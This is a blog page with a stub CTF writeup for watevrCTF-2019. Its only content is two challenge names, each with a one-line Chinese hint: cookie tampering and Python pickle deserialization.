<h1 id="watevrCTF-2019"><a href="#watevrCTF-2019" class="headerlink" title="watevrCTF-2019"></a>watevrCTF-2019</h1><h2 id="Cookie-Store"><a href="#Cookie-Store" class="headerlink" title="Cookie Store"></a>Cookie Store</h2><ul>
<li>改cookie薅羊毛</li>
</ul>
<h2 id="Pickle-Store"><a href="#Pickle-Store" class="headerlink" title="Pickle Store"></a>Pickle Store</h2><ul>
<li>pickle 反序列化</li>
</ul>

  </div>
  <div class="post-meta">
    <span class="post-time" style="color:#646060;font-size:13px">2020-03-12</span>
  </div>

  <div class="post-footer">
    
      <ul class="post-tag-list" itemprop="keywords"><li class="post-tag-list-item"><a class="post-tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li></ul>
    

    <a href="#top" class="top">Back to Top</a>
  </div>
</article>

<!-- 评论插件 -->

<footer>
  2025
  <span class="author">
    LionTree
  </span>
</footer>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    </div>
  </body>
</html>